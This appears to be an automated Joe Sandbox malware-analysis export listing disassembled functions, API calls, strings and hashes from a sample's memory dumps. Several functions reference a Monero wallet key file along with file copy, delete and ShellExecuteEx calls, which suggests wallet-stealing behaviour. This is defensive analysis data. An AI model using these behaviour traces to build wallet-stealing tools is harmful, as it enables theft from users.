Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 439452a5ebb6cf84361854fc10a53c75e390023e0b2bff48c1119dedc23efc10
Instruction ID: 01b765260976e21d25d4d9142fa4b780f09f6fd8428617edd3bc3c3532f5ceab
Opcode Fuzzy Hash: 439452a5ebb6cf84361854fc10a53c75e390023e0b2bff48c1119dedc23efc10
Instruction Fuzzy Hash: ED41E97150075C5EDF328B248D85FFB7BF99F49784F1484ECDA8E86182E275AA448F60

Function 6CBEB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB94290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CBD3EBD,6CBD3EBD,00000000), ref: 6CB942A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CBEB127), ref: 6CBEB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBEB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CBEB4E4

Strings

pid:, xrefs: 6CBEB4DE

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 9fc902741386c9441962731554719a6807102a6d65f04ce18d2c49b024a52971
Instruction ID: 804061e3a27c3838798b315e0d86acdd321382fdc15810da9b6432adbbfa51ab
Opcode Fuzzy Hash: 9fc902741386c9441962731554719a6807102a6d65f04ce18d2c49b024a52971
Instruction Fuzzy Hash: A9311431A01348DFDB00DFAAD880AEEB7B5FF49B58F540529E81167A41D731E849CBE6

Function 00776630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00776663

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

ShellExecuteEx.SHELL32(0000003C), ref: 00776726
ExitProcess.KERNEL32 ref: 00776755

Strings

<, xrefs: 007766D9

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 2c23b1083d3f54d4457b26fc495a1976d2f37d69675aee106454f58d50290622
Instruction ID: 809ec5c71e645e0efa63ed5d37251ba8c5f6a4ac79a8e7b297c693b005a43452
Opcode Fuzzy Hash: 2c23b1083d3f54d4457b26fc495a1976d2f37d69675aee106454f58d50290622
Instruction Fuzzy Hash: 6B312BB1C11208EBDB55EB50DC89BEE7778AF44300F408198F31966191DF786A48CF9A

Function 007787C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00780E28,00000000,?), ref: 0077882F
RtlAllocateHeap.NTDLL(00000000), ref: 00778836
wsprintfA.USER32 ref: 00778850

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Strings

%dx%d, xrefs: 00778847

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 0b78d0b5267071cf4960dffc8bd33c343b5f5775b929fee5b5d5bea1b7c68459
Instruction ID: 12ab7570c5c4c3a085f49396ffc72b38835b91ff90102719f2de5d3c77f0e4b3
Opcode Fuzzy Hash: 0b78d0b5267071cf4960dffc8bd33c343b5f5775b929fee5b5d5bea1b7c68459
Instruction Fuzzy Hash: BA2130B1A54204AFDB04DF98DD49FAEBBB8FF49B01F104119F605A7280C77D9900DBA1

Function 00778D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0077951E,00000000), ref: 00778D5B
RtlAllocateHeap.NTDLL(00000000), ref: 00778D62
wsprintfW.USER32 ref: 00778D78

Strings

%hs, xrefs: 00778D6F

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 3d90f6ea4a2204c9e0c5f64fe6fd042278f1b1a0c616d91b1f6b5bda89e5c70c
Instruction ID: c9013dbd37033d212cf36e123ac2dbaa1e944aed087c263ddcc9390370bf1c64
Opcode Fuzzy Hash: 3d90f6ea4a2204c9e0c5f64fe6fd042278f1b1a0c616d91b1f6b5bda89e5c70c
Instruction Fuzzy Hash: D9E08CB0A54208BFC700DF98DC0AE6977B8EF05702F000094FD0987280DA799E10EBD2

Function 6CBE0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CBE0CD5

Part of subcall function 6CBCF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CBCF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CBE0D40
free.MOZGLUE ref: 6CBE0DCB

Part of subcall function 6CBB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBB5EDB
Part of subcall function 6CBB5E90: memset.VCRUNTIME140(6CBF7765,000000E5,55CCCCCC), ref: 6CBB5F27
Part of subcall function 6CBB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBB5FB2

free.MOZGLUE ref: 6CBE0DDD
free.MOZGLUE ref: 6CBE0DF2

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 2978c1de089f7078b50b66531d4855d782af50c5d23a86cc1f9cce273ae1a769
Instruction ID: 6574ce47c47c4909abec4ab8e0ea1123e792af72199b7aad4ffdd2d29085e0c5
Opcode Fuzzy Hash: 2978c1de089f7078b50b66531d4855d782af50c5d23a86cc1f9cce273ae1a769
Instruction Fuzzy Hash: 14410771A187908BD720CF29C08079EFBE5FF89694F518A2EE8D887750DB709445DB93

Function 6CBECCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CBDDA31,00100000,?,?,00000000,?), ref: 6CBECDA4

Part of subcall function 6CBACA10: malloc.MOZGLUE(?), ref: 6CBACA26

Part of subcall function 6CBED130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CBECDBA,00100000,?,00000000,?,6CBDDA31,00100000,?,?,00000000,?), ref: 6CBED158
Part of subcall function 6CBED130: InitializeConditionVariable.KERNEL32(00000098,?,6CBECDBA,00100000,?,00000000,?,6CBDDA31,00100000,?,?,00000000,?), ref: 6CBED177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CBDDA31,00100000,?,?,00000000,?), ref: 6CBECDC4

Part of subcall function 6CBE7480: ReleaseSRWLockExclusive.KERNEL32(?,6CBF15FC,?,?,?,?,6CBF15FC,?), ref: 6CBE74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CBDDA31,00100000,?,?,00000000,?), ref: 6CBECECC

Part of subcall function 6CBACA10: mozalloc_abort.MOZGLUE(?), ref: 6CBACAA2

Part of subcall function 6CBDCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CBECEEA,?,?,?,?,00000000,?,6CBDDA31,00100000,?,?,00000000), ref: 6CBDCB57
Part of subcall function 6CBDCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CBDCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CBECEEA,?,?), ref: 6CBDCBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CBDDA31,00100000,?,?,00000000,?), ref: 6CBED058

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 441a835e7b61a4f9a9dea84bd83ed1481e134b71f7e334c2c4de30cc361d9fc9
Instruction ID: c0870030d06a9f86a45e4fd162326c72a1ea40a33c51ea5d7b619981f5c1faac
Opcode Fuzzy Hash: 441a835e7b61a4f9a9dea84bd83ed1481e134b71f7e334c2c4de30cc361d9fc9
Instruction Fuzzy Hash: 81D16D71A04B469FD708CF28C490B99B7E1FF89348F05862DD85987712EB71E965CBC1

Function 0076D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 00778B60: GetSystemTime.KERNEL32(00780E1A,0125AB00,007805AE,?,?,007613F9,?,0000001A,00780E1A,00000000,?,01259048,?,\Monero\wallet.keys,00780E17), ref: 00778B86

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0076D481
lstrlen.KERNEL32(00000000), ref: 0076D698
lstrlen.KERNEL32(00000000), ref: 0076D6AC
DeleteFileA.KERNEL32(00000000), ref: 0076D72B

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 11831d1e09ccc25272a9460e4d591c324cb0f7f4b1cd4ee373d72a0ec92b8ce3
Instruction ID: 32e4bd3a67752808cfa015ff2bacfb3dd3143cedff57462a328cb388e5d7c8d7
Opcode Fuzzy Hash: 11831d1e09ccc25272a9460e4d591c324cb0f7f4b1cd4ee373d72a0ec92b8ce3
Instruction Fuzzy Hash: 2891D271910104EBEF05FBA4DC5ADEE7378AF94340F50C169F51B66091EF386A19CBA2

Function 6CBB5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6CBB5D40
EnterCriticalSection.KERNEL32(6CC1F688), ref: 6CBB5D67
__aulldiv.LIBCMT ref: 6CBB5DB4
LeaveCriticalSection.KERNEL32(6CC1F688), ref: 6CBB5DED

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: e2ba326b596fede81b81a7b5752cb5098c5acfa9d336fcc858805966d2cf55a8
Instruction ID: 39a32f192022baff0cce7f873991867263d243445c0fc6b369d463d074051806
Opcode Fuzzy Hash: e2ba326b596fede81b81a7b5752cb5098c5acfa9d336fcc858805966d2cf55a8
Instruction Fuzzy Hash: FD517071E002698FCF08CF69C855ABEBBB2FB89304F19861DD815B7B50C770A945CB91

Function 6CB9CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB9CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CB9CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CB9CF4E

Strings

0, xrefs: 6CB9CF30

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 6a2825357957aa73d43f0cbdb6c64c0ca2376e50b9206601e3bc5de578fbe1ec
Instruction ID: 3cbf226199ac7596e93cc60dad820c41f548938a3ebc0b43f97d1cf48650b4d9
Opcode Fuzzy Hash: 6a2825357957aa73d43f0cbdb6c64c0ca2376e50b9206601e3bc5de578fbe1ec
Instruction Fuzzy Hash: 2F510375A006568FCB00CF18C490A9ABBB5EF9A300F19859DD85A5F752D731FD06CBE0

Function 00773560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
